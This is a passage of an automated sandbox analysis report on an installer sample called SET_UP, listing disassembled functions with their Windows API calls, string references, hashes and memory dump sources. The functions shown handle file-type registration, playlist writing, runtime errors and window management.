                                                                                                                                                                                                  • String ID: %s\%s$Data\File Types$Extension$Icon$Name
                                                                                                                                                                                                  • API String ID: 1777603892-1963114798
                                                                                                                                                                                                  • Opcode ID: 249285760898bfbefe9fb84ad85642f7871b94b2890eb829e0999c02507c7fd3
                                                                                                                                                                                                  • Instruction ID: be2485fb6aad35e7f84fac732997d908a7edaf2f8b0dc358ed0662d487f8ff28
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 249285760898bfbefe9fb84ad85642f7871b94b2890eb829e0999c02507c7fd3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 984149B1D00219AEDF01EBD5CD95AFEBBB8EB08314F20416EF511B2291D7785E08CB65
                                                                                                                                                                                                  Function 0049CCDD Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000010), ref: 0049CD4A
                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,004DE5BC,00000000,00000000,00000000,00000010), ref: 0049CE20
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000), ref: 0049CE27
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $hWP
                                                                                                                                                                                                  • API String ID: 3784150691-155117939
                                                                                                                                                                                                  • Opcode ID: e6c29f4ffdde8fa84d575663016d6b98bed3c016c68e719f230b8ed6c20ffdaa
                                                                                                                                                                                                  • Instruction ID: 488b030714d1fbe9c55dad7cd78576b862a50f9ae84916a8ac3aa1c52652e8fb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6c29f4ffdde8fa84d575663016d6b98bed3c016c68e719f230b8ed6c20ffdaa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5731C172A10208AEEF20EA62CD85F9F3BADEB46304F54047BF545A6140E678AA44CB5D
                                                                                                                                                                                                  Function 00430EE4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430EE9
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00430EF5
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(Playlist,00000000,00000000,?), ref: 00430F5C
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(Playlist,NumberOfEntries,?,?), ref: 00430F95
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(Playlist,?,?,?), ref: 00430FD4
                                                                                                                                                                                                    • Part of subcall function 004B8008: __EH_prolog.LIBCMT ref: 004B800D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfileStringWrite$H_prolog$ExistsFilePath
                                                                                                                                                                                                  • String ID: File%d$NumberOfEntries$Playlist
                                                                                                                                                                                                  • API String ID: 888805520-2421212926
                                                                                                                                                                                                  • Opcode ID: 163fd205e79cb92a6791c503e37cbc5e9a707c49a1349fec6e3050cf1bbaeec2
                                                                                                                                                                                                  • Instruction ID: 328a871e3d2a670a32b9253948468550221e8628c02eaeacfdbbe3e2123c0b55
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 163fd205e79cb92a6791c503e37cbc5e9a707c49a1349fec6e3050cf1bbaeec2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89314D71900209EFCB00EFA5CC81DEEBBB8BF08358F10412AF915A32A1D7789A44DB65
                                                                                                                                                                                                  Function 004B898A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 004B89A6
                                                                                                                                                                                                  • GetStockObject.GDI32(0000000D), ref: 004B89AE
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 004B89BB
                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004B89CA
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B89E1
                                                                                                                                                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 004B89ED
                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 004B89F8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                                                                  • String ID: System
                                                                                                                                                                                                  • API String ID: 46613423-3470857405
                                                                                                                                                                                                  • Opcode ID: 0f15ae94ddfa5905752a833a0eae201733889c3abecf8ff8b82fb3aad6dd80ac
                                                                                                                                                                                                  • Instruction ID: 949fb456aa4517d35feaa22f89457abdfb768c660aab8826c9d52e595a7c4e27
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f15ae94ddfa5905752a833a0eae201733889c3abecf8ff8b82fb3aad6dd80ac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B117771600318ABEB505B928C49FAE7B69BB04744F00402AFA05AB2D0DB789D41C769
                                                                                                                                                                                                  Function 00409E4C Relevance: 13.9, APIs: 9, Instructions: 356COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409F10
                                                                                                                                                                                                  • InflateRect.USER32(?,000000FC,00000000), ref: 00409F1A
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00409F43
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,00000000,?,?,00000001,?,?,?), ref: 00409FD9
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 0040A01D
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 0040A073
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A161
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A1BE
                                                                                                                                                                                                  • ImageList_Draw.COMCTL32(?,00000000,?,?,?,00000000,?,?,?), ref: 0040A20F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$CopyDrawImageList_$Inflate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4227890606-0
                                                                                                                                                                                                  • Opcode ID: b0efb927cd3436fa5fd80904f58b3c1d78bcdf80f6780aefdee4b746a66a05db
                                                                                                                                                                                                  • Instruction ID: 92020e2eecfb7317819433571d001b429f2b29006b06b49c862b72495a03d568
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0efb927cd3436fa5fd80904f58b3c1d78bcdf80f6780aefdee4b746a66a05db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52D14E72900209AFDF04CFA8C989AEEB7B5FF48310F14817AF915AB291D775AD50CB64
                                                                                                                                                                                                  Function 004A8AC4 Relevance: 13.7, APIs: 9, Instructions: 221COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,004DE718,00000001,004DE718,00000001,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A8B02
                                                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,0050924C,00000001,0050924C,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8B1F
                                                                                                                                                                                                  • CompareStringA.KERNEL32(00000000,00000000,00000000,00000000,0049B392,?,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392), ref: 004A8B7D
                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,00000000,00000000,-00000004,00000001,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8BCE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8C4D
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CAE
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,0049B392,?,00000000,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8CC1
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0049B392,?,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D0D
                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,004A534E,0049B51F,00000000,?,?,0049B392,00000000), ref: 004A8D25
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharCompareMultiStringWide$Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1651298574-0
                                                                                                                                                                                                  • Opcode ID: 91f13f7c9b146f374f97c61e1520f3a46ab4c5bdd4a1d637144c00780d7c1f48
                                                                                                                                                                                                  • Instruction ID: bf659344a960f430bd7b4477a42148c72f6b8ff99e55e546d8c3e034bb9895f9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91f13f7c9b146f374f97c61e1520f3a46ab4c5bdd4a1d637144c00780d7c1f48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C671BFB2900249AFDF219F548C859EF7FB5EB26354F14002FF950A6260DB399C51DB68
                                                                                                                                                                                                  Function 004811D0 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 180stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • keyword length must be 1 - 79 characters, xrefs: 00481354
                                                                                                                                                                                                  • extra interior spaces removed from keyword, xrefs: 0048131C
                                                                                                                                                                                                  • Zero length keyword, xrefs: 00481337
                                                                                                                                                                                                  • invalid keyword character 0x%02X, xrefs: 00481259
                                                                                                                                                                                                  • zero length keyword, xrefs: 0048137B
                                                                                                                                                                                                  • leading spaces removed from keyword, xrefs: 004812BC
                                                                                                                                                                                                  • trailing spaces removed from keyword, xrefs: 00481295
                                                                                                                                                                                                  • Out of memory while procesing keyword, xrefs: 0048121D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                  • String ID: Out of memory while procesing keyword$Zero length keyword$extra interior spaces removed from keyword$invalid keyword character 0x%02X$keyword length must be 1 - 79 characters$leading spaces removed from keyword$trailing spaces removed from keyword$zero length keyword
                                                                                                                                                                                                  • API String ID: 1659193697-1527206911
                                                                                                                                                                                                  • Opcode ID: 5de0042efd6f438436a9aafe143c22658e2568d88d5476f359e8edae073ae5cb
                                                                                                                                                                                                  • Instruction ID: d607f5cd755e10ddc6d6cf3c1b1c56616c890e7ef7e648725b2c6274c0aeb7a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de0042efd6f438436a9aafe143c22658e2568d88d5476f359e8edae073ae5cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61518B615082854EE7207A299C817BFBB9DDFA6304F14089FECC497353E71E584783BA
                                                                                                                                                                                                  Function 004ACFE0 Relevance: 13.6, APIs: 9, Instructions: 128threadwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004ACFE7
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0), ref: 004ACFF4
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0), ref: 004AD03C
                                                                                                                                                                                                  • CallNextHookEx.USER32(00000000,?,?,?), ref: 004AD053
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0050CEA0), ref: 004AD06E
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD0B2
                                                                                                                                                                                                  • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 004AD0D9
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD141
                                                                                                                                                                                                  • CallNextHookEx.USER32(?,?,?,?), ref: 004AD17E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1151315845-0
                                                                                                                                                                                                  • Opcode ID: 9db34d6927e4a001b014c5feffa016a50dc01a87ea5c3e8cd0c9f43cd39576ea
                                                                                                                                                                                                  • Instruction ID: 65dbdf464b597f01950311a6373fc1a4e60cc255b96ac45d809af6f6ba383759
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db34d6927e4a001b014c5feffa016a50dc01a87ea5c3e8cd0c9f43cd39576ea
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3141E271904301AFD710DF11EC85E6B7BA9FB67758F04012AFD0683691D778A84ACBAA
                                                                                                                                                                                                  Function 004BC944 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 004BC950
                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 004BC96E
                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004BC97B
                                                                                                                                                                                                  • GetCapture.USER32 ref: 004BC9CB
                                                                                                                                                                                                    • Part of subcall function 004B57CE: IsWindowEnabled.USER32(?), ref: 004B57D8
                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 004BCA15
                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004BCA21
                                                                                                                                                                                                  • IsChild.USER32(?,00000000), ref: 004BCA36
                                                                                                                                                                                                  • KillTimer.USER32(?,0000E001), ref: 004BCA7C
                                                                                                                                                                                                  • KillTimer.USER32(?,0000E000), ref: 004BCA99
                                                                                                                                                                                                    • Part of subcall function 004B40D2: GetForegroundWindow.USER32(00000000,?,004BC9A7), ref: 004B40D6
                                                                                                                                                                                                    • Part of subcall function 004B40D2: GetLastActivePopup.USER32(?), ref: 004B40EE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1383385731-0
                                                                                                                                                                                                  • Opcode ID: 1ef7cde573e895071a388ef560c9d35854c41d435042296ff5ca0cfa2670bb87
                                                                                                                                                                                                  • Instruction ID: 93482641ce24bdbc3448831960157b53e83527a1d56080e1fde28f1df50a6ebb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ef7cde573e895071a388ef560c9d35854c41d435042296ff5ca0cfa2670bb87
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03419030600609EFDB21DF65CCC8BEEB7B5AB44754F20466AE461D72A0EB38DD018B68
                                                                                                                                                                                                  Function 00410C40 Relevance: 13.6, APIs: 9, Instructions: 106windowstringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,?,?,00406FCB,00000001,00000000,00000000,00000206,?,00000000,00000000,?), ref: 00410C50
                                                                                                                                                                                                  • GetFocus.USER32 ref: 00410C89
                                                                                                                                                                                                    • Part of subcall function 004B2F30: UnhookWindowsHookEx.USER32(?), ref: 004B2F55
                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00410CC9
                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00410CE1
                                                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000000,?), ref: 00410D10
                                                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000000,?), ref: 00410D1E
                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00410D3C
                                                                                                                                                                                                  • IsWindow.USER32(?), ref: 00410D42
                                                                                                                                                                                                  • SetFocus.USER32(?), ref: 00410D50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3606897497-0
                                                                                                                                                                                                  • Opcode ID: 5194c71222fdfb465dc0cf7bb3ee08d124c6cb766859f31db52a4ef58b45ef11
                                                                                                                                                                                                  • Instruction ID: 5d2738cb76d04dc6160773a7b9f40ed57a1d595764b959a15ed6090cb5796c63
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5194c71222fdfb465dc0cf7bb3ee08d124c6cb766859f31db52a4ef58b45ef11
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E3196702102085BDB597B67D95AEAE7A95AF40704B01412FF4058B2A3EFBDD8C1CB9D
                                                                                                                                                                                                  Function 004ACA00 Relevance: 13.6, APIs: 9, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0050CEA0,?,004ABE5F), ref: 004ACA06
